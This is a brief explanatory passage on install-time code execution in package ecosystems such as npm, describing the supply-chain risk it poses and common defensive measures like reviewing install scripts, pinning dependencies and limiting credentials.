Install-time code execution means a package can run code while it is being installed, not just when the application later starts. In ecosystems like npm, this can happen through installer hooks, build steps, or scripts bundled with a dependency. Because the install process often has network access, file access, and sometimes access to developer credentials, it widens the attack surface for anyone who can control a package.
Attackers abuse this by hiding malicious logic in a package that looks legitimate, then stealing secrets, modifying build output, or downloading additional payloads during installation. Defenders treat it as a supply-chain risk: review packages and their scripts, pin dependencies, use scoped or short-lived credentials, and disable install scripts where practical. The goal is to limit what untrusted code can do at the moment a package is introduced into a system.